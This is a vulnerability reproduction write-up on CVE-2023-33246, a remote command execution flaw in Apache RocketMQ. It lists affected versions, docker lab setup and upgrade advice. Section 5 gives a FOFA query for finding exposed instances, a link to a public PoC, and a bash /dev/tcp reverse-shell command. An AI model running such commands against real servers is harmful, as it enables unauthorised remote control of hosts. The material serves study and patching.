Article directory
foreword
RocketMQ is a distributed message middleware developed by Alibaba in 2012. It is specially designed for trillion-level ultra-large-scale message processing. It has the characteristics of high throughput, low latency, massive accumulation, and sequential sending and receiving. At the same time, it is a distributed message and streaming data platform with low latency, high performance, high reliability, trillion-level capacity and flexible scalability.
statement
This article is only used for vulnerability reproduction and technical research. Please do not use the relevant technologies in the article to engage in illegal testing. All adverse consequences have nothing to do with the author of the article. This article is for educational purposes only! ! !
1. Vulnerability description
In RocketMQ 5.1.0 and below, under certain conditions, there is a risk of remote command execution; because multiple components of RocketMQ NameServer
, , Broker
, Controller
and so on are exposed to the external network and lack permission verification, attackers can exploit this vulnerability to use the update configuration function to run with RocketMQ Execute the command as the system user. In addition, attackers can also achieve the same effect by forging the content of the RocketMQ protocol.
2. Vulnerabilities and hazards
An attacker can execute commands as the system user under which RocketMQ is running by using the update configuration feature. In addition, attackers can also achieve the same exploit effect by forging the content of the RocketMQ protocol.
Three, the impact version
- Apache RocketMQ <= 5.1.0
- Apache RocketMQ <= 4.9.5
Security version:
- Apache RocketMQ 5.x >= 5.1.1
- Apache RocketMQ 4.x >= 4.9.6
4. Environment construction
This time, directly use docker to pull the vulnerable environment.
Download the docker image:
docker pull apache/rocketmq:4.9.1
docker pull apacherocketmq/rocketmq-console:2.0.0
Start namesrv:
docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
Start the broker service (create and configure the broker file first)
创建broker文件目录
mkdir -p /mydata/rocketmq/conf/
配置broker文件
vim /mydata/rocketmq/conf/broker.conf
将下面内容复制粘贴到broker.conf配置文件中:
brokerClusterName = DefaultCluster
brokerName = broker-a
brokerId = 0
deleteWhen = 04
fileReservedTime = 48
brokerRole = ASYNC_MASTER
flushDiskType = SYNC_FLUSH
brokerIP1 = X.X.X.X(宿主机IP)
Start the broker:
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /mydata/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
Start Console:
docker run -d --name rmqconsole -p 8899:8080 -e "JAVA_OPTS=-Drocketmq.config.namesrvAddr=rmqnamesrv:9876 -Droc
ketmq.config.isVIPChannel=false" apacherocketmq/rocketmq-console:2.0.0
The last access IP:8899
display page is as follows:
The environment is built successfully! ! !
5. Vulnerability recurrence
FOFA:title=“RocketMQ”
POC attack
Github download address: https://github.com/Serendipity-Lucky/CVE-2023-33246
Use the following command to reverse Shell
PS: When testing locally, the ip of the rebound shell cannot be the same as the ip of the docker startup environment, otherwise the shell cannot be received
命令: java -jar CVE-2023-33246.jar -ip “X.X.X.X” -cmd “bash -i >& /dev/tcp/X.X.X.X/4444 0>&1”
6. Repair suggestions
At present, the official security repair update has been released, and affected users can upgrade to Apache RocketMQ 5.1.1
or4.9.6
https://rocketmq.apache.org/download/
https://vip.tophant.com/patch?keyword=/Apache/Apache%20RocketMQ/Apache%20RocketMQ%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-33246)